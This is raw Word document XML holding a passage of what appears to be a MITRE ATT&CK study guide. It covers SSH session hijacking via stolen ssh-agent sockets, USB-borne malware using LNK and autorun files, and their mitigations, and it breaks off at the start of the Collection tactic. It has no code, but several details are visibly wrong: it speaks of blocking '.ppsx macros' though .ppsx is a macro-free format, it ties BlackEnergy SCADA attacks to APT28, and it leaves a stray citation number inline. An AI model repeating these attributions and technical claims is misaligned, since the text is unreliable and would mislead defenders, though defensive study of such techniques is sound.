        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Implement email banner warnings for external senders to highlight internal impersonation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Restrict attachment execution via Group Policy (e.g., block .ppsx macros).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>2) Technique: Remote Service Session Hijacking → SSH Hijacking (T1563.001)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073177B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries hijack active SSH sessions to move laterally without authentication. By stealing SSH agent sockets or keys, they impersonate authenticated users, bypassing credential requirements 2311.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0073177B" w:rsidRDefault="0073177B" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="0073177B" w:rsidRDefault="008B486A" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073177B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Sub-technique: SSH Hijacking (T1563.001)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>SSH’s trust model allows session reuse. Compromising the ssh-agent process or its socket (/tmp/ssh-*) lets adversaries inject commands into established connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0073177B" w:rsidRDefault="0073177B" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="0073177B" w:rsidRDefault="0073177B" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidR="008B486A" w:rsidRPr="0073177B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="0073177B" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073177B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>SSH-Agent Socket Theft for Root Access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries with root access copy the ssh-agent socket (e.g., /tmp/ssh-XXXX/agent.1234) and set SSH_AUTH_SOCK to hijack sessions. This grants access to all systems the victim connected to.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: TeamTNT stole sockets from Docker containers to spread cryptominers across cloud servers. No passwords were needed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Accesses jump servers, databases, and CI/CD pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="0073177B" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073177B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Private Key Extraction from Memory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Tools like ssh-agent-watch dump decrypted private keys from ssh-agent memory. Adversaries use these keys for direct login to trusted hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: APT34 extracted keys from a developer’s workstation to compromise production AWS instances.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Persists even after sessions expire.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="0073177B" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073177B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Disable SSH agent forwarding via /etc/ssh/sshd_config: AllowAgentForwarding no.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Enforce key passphrases and rotate keys every 90 days.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>3) Technique: Replication Through Removable Media (T1091)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073177B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries spread malware via USB drives or external devices. Auto-run features or disguised files trick users into executing payloads, enabling lateral movement to air-gapped systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0073177B" w:rsidRDefault="0073177B" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidR="008B486A" w:rsidRPr="0073177B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0073177B" w:rsidRDefault="0073177B" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="0073177B" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073177B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Malicious LNK Files on USB Drives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries place shortcut files (Report.lnk) on USBs. When opened, they execute PowerShell to download payloads. Auto-run is disabled in modern Windows, so social engineering is key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: APT28 left infected USBs in parking lots of energy firms. The LNK files deployed BlackEnergy to SCADA systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Bridges air-gapped networks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="0073177B" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073177B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Wormable USB Malware with Autorun</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Malware like Raspberry Robin uses .inf files to auto-execute when inserted. It then exploits Windows Installer (msiexec) to spread to network shares.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: FIN7 distributed USB drives mimicking vendor gifts. The malware scanned for backup servers and exfiltrated data via C2 channels.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Propagates without internet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="0073177B" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073177B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Disable USB storage via Group Policy: Computer Configuration → Administrative Templates → System → Removable Storage Access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRDefault="008B486A" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B486A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Deploy Endpoint Detection and Response (EDR) tools to monitor msiexec spawned from USB drives.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B486A" w:rsidRPr="008B486A" w:rsidRDefault="008B486A" w:rsidP="008B486A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F34F9E" w:rsidRPr="005F3585" w:rsidRDefault="00F34F9E" w:rsidP="0073177B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Collection</w:t>
      </w:r>
      <w:r w:rsidR="0073177B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0073177B" w:rsidRPr="0073177B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Tactic (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition: Collection involves techniques adversaries use to gather valuable information from compromised systems, such as credentials, audio recordings, browser sessions, or screenshots. This data supports objectives like espionage, credential theft, or further system compromise. Collected information is often staged before exfiltration to attacker-controlled servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1) Technique: Audio Capture (T1123)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
